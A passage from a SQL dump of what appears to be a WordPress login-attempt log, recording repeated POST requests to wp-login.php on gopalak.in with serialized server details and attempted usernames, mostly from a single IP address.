03:41:30'),(94671,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52131\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049733.3235259;s:12:\"REQUEST_TIME\";i:1746049733;}}','196.251.112.104',1,'2025-05-01 03:18:55','2025-05-02 03:41:30'),(94672,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52130\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049733.3200049;s:12:\"REQUEST_TIME\";i:1746049733;}}','196.251.112.104',1,'2025-05-01 03:18:55','2025-05-02 03:41:30'),(94673,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52650\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049886.497921;s:12:\"REQUEST_TIME\";i:1746049886;}}','196.251.112.104',1,'2025-05-01 03:21:28','2025-05-02 03:41:30'),(94674,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52653\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049886.5227759;s:12:\"REQUEST_TIME\";i:1746049886;}}','196.251.112.104',1,'2025-05-01 03:21:28','2025-05-02 03:41:30'),(94675,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52654\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049886.5256341;s:12:\"REQUEST_TIME\";i:1746049886;}}','196.251.112.104',1,'2025-05-01 03:21:28','2025-05-02 03:41:30'),(94676,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52655\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049886.5305669;s:12:\"REQUEST_TIME\";i:1746049886;}}','196.251.112.104',1,'2025-05-01 03:21:28','2025-05-02 03:41:30'),(94677,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52651\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049886.5131769;s:12:\"REQUEST_TIME\";i:1746049886;}}','196.251.112.104',1,'2025-05-01 03:21:28','2025-05-02 03:41:30'),(94678,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36292\";s:11:\"REMOTE_ADDR\";s:11:\"67.205.0.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049976.0558319;s:12:\"REQUEST_TIME\";i:1746049976;}}','67.205.0.54',0,'2025-05-01 03:22:57','1970-01-01 00:00:00'),(94679,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53181\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050048.1530299;s:12:\"REQUEST_TIME\";i:1746050048;}}','196.251.112.104',1,'2025-05-01 03:24:09','2025-05-02 03:41:30'),(94680,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53182\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050048.1538041;s:12:\"REQUEST_TIME\";i:1746050048;}}','196.251.112.104',1,'2025-05-01 03:24:09','2025-05-02 03:41:30'),(94681,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53185\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050048.1838739;s:12:\"REQUEST_TIME\";i:1746050048;}}','196.251.112.104',1,'2025-05-01 03:24:09','2025-05-02 03:41:30'),(94682,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53184\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050048.174113;s:12:\"REQUEST_TIME\";i:1746050048;}}','196.251.112.104',1,'2025-05-01 03:24:09','2025-05-02 